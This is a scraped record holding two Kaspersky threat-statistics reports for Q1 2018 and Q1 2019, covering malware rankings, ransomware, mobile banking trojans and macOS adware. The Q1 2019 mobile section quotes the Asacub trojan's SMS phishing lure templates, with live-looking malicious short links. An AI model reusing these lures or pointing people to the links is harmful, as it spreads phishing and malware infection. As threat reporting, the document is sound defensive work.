Zbot | 28.0% | \n2 | Nymaim | Trojan.Win32. Nymaim | 20.3% | \n3 | Caphaw | Backdoor.Win32. Caphaw | 15.2% | \n4 | SpyEye | Backdoor.Win32. SpyEye | 11.9% | \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% | \n6 | Emotet | Backdoor.Win32. Emotet | 2.4% | \n7 | Neurevt | Trojan.Win32. Neurevt | 2.3% | \n8 | Shiz | Backdoor.Win32. Shiz | 2.1% | \n9 | Gozi | Trojan.Win32. Gozi | 1.9% | \n10 | ZAccess | Backdoor.Win32. ZAccess | 1.3% | \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.__ \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. 
In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affilate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. 
The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. 
Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 | \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 | \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 | \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 | \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 | \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 | \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. 
Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112 **attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). 
Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). 
\n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n_** _Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "cvss3": {}, "published": "2018-05-14T10:00:30", "type": "securelist", "title": "IT threat evolution Q1 2018. 
Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "modified": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T14:29:14", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.\n * 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.\n * Ransomware attacks were defeated on the computers of 284,489 unique users.\n * Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 905,174 malicious installation packages\n * 29,841 installation packages for mobile banking Trojans\n * 27,928 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ1 2019 is remembered mainly for mobile financial threats.\n\nFirst, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. 
The mailings contained one of the following messages:\n\n_{Name of victim}, you received a new mms: ____________________________ from {Name of victim's contact}_ \n_{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim's contact}_ \n_{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim's contact}_ \n_{Name of victim}, you have an mms notification ____________________________ from {Name of victim's contact}_\n\nSecond, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172941/it-threat-stats-q1-2019-1.png>)\n\nAlthough such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.\n\n### Mobile threat statistics\n\nIn Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.\n\n_Number of detected malicious installation packages, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171046/mobile-malware-apk.png>)\n\n#### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171122/infographic.png>)\n\nAmong all the threats detected in Q1 2019, the lion's share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. 
The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.\n\nIn second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.\n\nThe share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.\n\nThe statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.\n\nThe most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 54.26 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.72 \n3 | Trojan-Banker.AndroidOS.Asacub.snt | 4.98 \n4 | DangerousObject.AndroidOS.GenericML | 4.35 \n5 | Trojan-Banker.AndroidOS.Asacub.a | 3.49 \n6 | Trojan-Dropper.AndroidOS.Hqwar.bb | 3.36 \n7 | Trojan-Dropper.AndroidOS.Lezok.p | 2.60 \n8 | Trojan-Banker.AndroidOS.Agent.ep | 2.53 \n9 | Trojan.AndroidOS.Dvmap.a | 1.84 \n10 | Trojan-Banker.AndroidOS.Svpeng.q | 1.83 \n11 | Trojan-Banker.AndroidOS.Asacub.cp | 1.78 \n12 | Trojan.AndroidOS.Agent.eb | 1.74 \n13 | 
Trojan.AndroidOS.Agent.rt | 1.72 \n14 | Trojan-Banker.AndroidOS.Asacub.ce | 1.70 \n15 | Trojan-SMS.AndroidOS.Prizmes.a | 1.66 \n16 | Exploit.AndroidOS.Lotoor.be | 1.59 \n17 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.57 \n18 | Trojan-Dropper.AndroidOS.Tiny.d | 1.51 \n19 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.49 \n20 | Trojan.AndroidOS.Triada.dl | 1.47 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked._\n\nAs is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system [based on machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).\n\nThe DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab's infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company's security solutions before such files go for processing. 
The latest threat patterns are now detected this way.\n\nSixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.\n\nSeventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:\n\n * It is extremely difficult for an ordinary user to determine whether their device is already infected.\n * Getting rid of such malware is highly complex.\n\nThe Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.\n\nThe last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. 
It uses Accessibility Services to obtain various rights and interact with other apps.\n\n### Geography of mobile threats\n\n_Map of mobile malware infection attempts, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172806/en-mobile-malware-map.png>)\n\nTop 10 countries by share of users attacked by mobile malware:\n\n| Country* | %** \n---|---|--- \n1 | Pakistan | 37.54 \n2 | Iran | 31.55 \n3 | Bangladesh | 28.38 \n4 | Algeria | 24.03 \n5 | Nigeria | 22.59 \n6 | India | 21.53 \n7 | Tanzania | 20.71 \n8 | Indonesia | 17.16 \n9 | Kenya | 16.27 \n10 | Mexico | 12.01 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nPakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.\n\nSecond place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy \u2013 the main task of this app is to intercept Telegram messages. 
It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.\n\nThird place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **29,841** installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.\n\nThe greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.\n\n_Number of installation packages for mobile banking Trojans, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171308/banking-malware-apk.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.snt | 23.32 \n2 | Trojan-Banker.AndroidOS.Asacub.a | 16.35 \n3 | Trojan-Banker.AndroidOS.Agent.ep | 11.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 8.57 \n5 | Trojan-Banker.AndroidOS.Asacub.cp | 8.33 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.96 \n7 | Trojan-Banker.AndroidOS.Svpeng.ak | 7.00 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 4.96 \n9 | Trojan-Banker.AndroidOS.Asacub.ar | 2.47 \n10 | Trojan-Banker.AndroidOS.Hqwar.t | 2.10 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by banking threats._\n\nThis time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. 
But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.\n\nIt was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals' transition to a two-stage system of infection using Hqwar droppers.\n\n_Geography of mobile banking threats, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171335/en-banking-malware-map.png>)\n\n**Top 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Australia | 0.81 \n2 | Turkey | 0.73 \n3 | Russia | 0.64 \n4 | South Africa | 0.35 \n5 | Ukraine | 0.31 \n6 | Tajikistan | 0.25 \n7 | Armenia | 0.23 \n8 | Kyrgyzstan | 0.17 \n9 | US | 0.16 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nIn Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. 
Neither type of malware is exclusive to Australia; both are used for attacks worldwide.\n\nSecond place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.\n\nRussia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.\n\n### Mobile ransomware\n\nIn Q1 2019, we detected **27,928** installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.\n\n_Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 \u2013 Q1 2019)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171455/mobile-ransomware.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ah | 28.91 \n2 | Trojan-Ransom.AndroidOS.Rkor.h | 19.42 \n3 | Trojan-Ransom.AndroidOS.Svpeng.aj | 9.46 \n4 | Trojan-Ransom.AndroidOS.Small.as | 8.81 \n5 | Trojan-Ransom.AndroidOS.Rkor.snt | 5.36 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 5.21 \n7 | Trojan-Ransom.AndroidOS.Small.o | 3.24 \n8 | Trojan-Ransom.AndroidOS.Fusob.h | 2.74 \n9 | Trojan-Ransom.AndroidOS.Small.ce | 2.49 \n10 | Trojan-Ransom.AndroidOS.Svpeng.snt | 2.33 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by ransomware._\n\nIn Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.\n\n_Geography of mobile ransomware, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171523/en-mobile-ransomware-map.png>)\n\nTop 10 countries by share of users attacked by mobile ransomware:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.54 \n2 | Kazakhstan | 0.36 \n3 | Iran | 0.28 \n4 | Pakistan | 0.14 \n5 | Mexico | 0.10 \n6 | Saudi Arabia | 0.10 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Indonesia | 0.05 \n10 | Belgium | 0.05 \n \n_* Excluded from the rating are 
countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nThe Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%).\n\n## Attacks on Apple macOS\n\nOn the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.\n\nThe modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:\n\n 1. The code that displays the advertising banner to run as often as possible on the infected machine,\n 2. The victim to click on the banners as often as possible,\n 3. As many victims as possible.\n\nIt should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. 
Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.62 \n2 | AdWare.OSX.Spc.a | 20.07 \n3 | AdWare.OSX.Pirrit.j | 10.31 \n4 | AdWare.OSX.Pirrit.p | 8.44 \n5 | AdWare.OSX.Agent.b | 8.03 \n6 | AdWare.OSX.Pirrit.o | 7.45 \n7 | AdWare.OSX.Pirrit.s | 6.88 \n8 | AdWare.OSX.Agent.c | 6.03 \n9 | AdWare.OSX.MacSearch.a | 5.95 \n10 | AdWare.OSX.Cimpli.d | 5.72 \n11 | AdWare.OSX.Mcp.a | 5.71 \n12 | AdWare.OSX.Pirrit.q | 5.55 \n13 | AdWare.OSX.MacSearch.d | 4.48 \n14 | AdWare.OSX.Agent.a | 4.39 \n15 | Downloader.OSX.InstallCore.ab | 3.88 \n16 | AdWare.OSX.Geonei.ap | 3.75 \n17 | AdWare.OSX.MacSearch.b | 3.48 \n18 | AdWare.OSX.Geonei.l | 3.42 \n19 | AdWare.OSX.Bnodlero.q | 3.33 \n20 | RiskTool.OSX.Spigot.a | 3.12 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's security solutions for macOS that were attacked._\n\nTrojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.\n\nAdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various \"cleaner\" programs for macOS. After installation, they write themselves to the autoloader and run in the background.\n\nMembers of the AdWare.OSX.Pirrit family add extensions to the victim's browser; some versions also install a proxy server on the victim's machine to intercept traffic from the browser. 
All this serves one purpose \u2013 to inject advertising into web pages viewed by the user.\n\nThe malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.\n\nAdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim's browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user's knowledge.\n\nAdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim's browser.\n\nThe creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.\n\nThe AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs creator-owned obfuscation techniques to counteract security solutions. 
